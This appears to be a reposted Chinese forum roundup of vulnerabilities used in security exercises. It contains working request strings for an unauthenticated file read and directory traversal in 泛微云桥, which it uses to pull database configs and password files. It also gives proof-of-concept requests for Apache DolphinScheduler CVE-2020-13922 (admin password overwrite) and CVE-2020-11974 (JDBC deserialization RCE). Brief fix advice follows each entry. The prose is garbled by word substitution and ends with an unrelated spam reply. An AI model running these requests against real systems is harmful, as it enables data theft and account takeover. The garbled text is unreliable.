    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.任意读取winodws下的win.ini值</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,返回数据包内<span style="color: black;">显现</span>了程序的绝对路径,攻击者<span style="color: black;">能够</span><span style="color: black;">经过</span>返回内容识别程序运行路径从而下载数据库配置文件<span style="color: black;">害处</span>可见。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)downloadUrl参数修改成需要获取文件的绝对路径,记录返回包中的id值。http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&amp;downloadUrl=file:///c://windows/win.ini&amp;fileExt=txt</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)<span style="color: black;">经过</span>查看文件接口<span style="color: black;">拜访</span> /file/fileNoLogin/id</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(3)其他利用技巧(读取任意目录文件)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">简单说说昨天泛微云桥的报告,输入文件路径-&gt;读取文件内容,<span style="color: black;">咱们</span>读了一下代码后<span style="color: black;">发掘</span>这还能读取文件目录。参数不填写绝对路径写进文本内容<span style="color: black;">便是</span>当前的目录,产生了一个新的漏洞 “目录遍历”</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">/wxjsapi/saveYZJFile?fileName=test&amp;downloadUrl=file:///D:/&amp;fileExt=txt</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">目录遍历+文件读取,<span style="color: black;">咱们</span>能做的事情就<span style="color: black;">非常多</span>了,<span style="color: black;">例如</span>读取管理员在桌面留下的<span style="color: black;">秘码</span>文件、数据库配置文件、nginx代理配置、<span style="color: black;">拜访</span>日志、D盘迅雷下载:</p><span style="color: black;"><span style="color: black;">d:</span>/<span style="color: black;">/ebridge/</span><span style="color: black;">/tomcat/</span><span style="color: black;">/webapps/</span><span style="color: black;">/ROOT/</span><span style="color: black;">/WEB-INF/</span><span style="color: black;">/classes/</span><span style="color: black;">/init.properties</span></span><span style="color: black;"><span style="color: black;">d:/</span>OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties </span><span style="color: black;">泛微OA数据库</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.修复<span style="color: black;">意见</span>:</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">关闭程序路由 /file/fileNoLogin</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">9、</span>网瑞达webVPN RCE漏洞</span></strong></p><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞描述</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">WebVPN是<span style="color: black;">供给</span>基于web的内网应用访问<span style="color: black;">掌控</span>,<span style="color: black;">准许</span>授权用户<span style="color: black;">拜访</span>只对内网开放的web应用,实现类似VPN(虚拟专用网)的功能。<span style="color: black;">近期</span>网瑞达的webVPN被曝出存在RCE的漏洞。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.修复<span style="color: black;">意见</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">意见</span>去官网更新最新版本</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">二十、Apache DolphinScheduler高危漏洞(CVE-2020-11974、CVE-2020-13922)</span></strong></p><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞描述</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Apache软件基金会发布安全公告,修复了Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)与Apache DolphinScheduler 远程执行代码漏洞(CVE-2020-11974)。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">CVE-2020-11974与mysql connectorj远程执行代码漏洞<span style="color: black;">相关</span>,在<span style="color: black;">选取</span>mysql<span style="color: black;">做为</span>数据库时,攻击者可<span style="color: black;">经过</span>jdbc connect参数输入</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">{“detectCustomCollations”:true,“ autoDeserialize”:true} 在DolphinScheduler 服务器上远程执行代码。CVE-2020-13922<span style="color: black;">引起</span>普通用户可<span style="color: black;">经过</span>api interface在DolphinScheduler 系统中覆盖其他用户的<span style="color: black;">秘码</span>:api interface</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">/dolphinscheduler/users/update,请<span style="color: black;">关联</span>用户<span style="color: black;">即时</span>升级进行防护。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响范围</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.受影响版本</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.不受影响版本</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Apache DolphinScheduler &gt;= 1.3.2</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Apache DolphinScheduler远程执行代码漏洞(CVE-2020-11974)&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.利用POC:</strong></p><span style="color: black;">POST /dolphinscheduler/users/<span style="color: black;">update</span></span><span style="color: black;"><span style="color: black;">id</span>=<span style="color: black;">1</span>&amp;userName=<span style="color: black;">admin</span>&amp;userPassword=Password1!&amp;tenantId=<span style="color: black;">1</span>&amp;email=sdluser%<span style="color: black;">40</span>sdluser.sdluser&amp;phone=</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">利用漏洞:需要登录权限,<span style="color: black;">供给</span>一组默认<span style="color: black;">秘码</span>。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">该漏洞存在于数据源中心未限制添加的jdbc连接参数,从而实现JDBC客户端反序列化。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1、登录到面板 -&gt; 数据源中心。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2、jdbc连接参数<span style="color: black;">便是</span>主角,<span style="color: black;">这儿</span><span style="color: black;">无</span>限制任意类型的连接串参数。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3、将以下数据添加到jdbc连接参数中,就<span style="color: black;">能够</span>直接触发。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;">POST /dolphinscheduler/datasources/connect</span><span style="color: black;">HTTP/1.1</span><span style="color: black;"><span style="color: black;">type</span>=MYSQL&amp;name=<span style="color: black;">test</span>&amp;note=&amp;host=127.0.0.1&amp;port=3306&amp;database=<span style="color: black;">test</span>&amp; principal=&amp;userName=root&amp;password=root&amp;connectType=&amp;</span><span style="color: black;">other={<span style="color: black;">"detectCustomCollations"</span>:<span style="color: black;">true</span>,<span style="color: black;">"autoDeserialize"</span>:<span style="color: black;">true</span>}</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">关于MySQL JDBC客户端反序列化漏洞的<span style="color: black;">关联</span>参考:https://www.anquanke.com/post/id/203086</p>

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.修复<span style="color: black;">意见</span>官方升级</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">日前</span>官方已在最新版本中修复了此次的漏洞,请受影响的用户尽快升级版本至1.3.2进行防护,官方下载链接:https://dolphinscheduler.apache.org/zhcn/docs/release/download.html</p><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">如有任何问题、<span style="color: black;">意见</span>、合作、投稿请加get_system</span><span style="color: black;">,以方便<span style="color: black;">即时</span>回复。</span></p>




7wu1wm0 发表于 前天 04:59

外贸B2B平台有哪些?
页: [1]
查看完整版本: 护网漏洞汇总②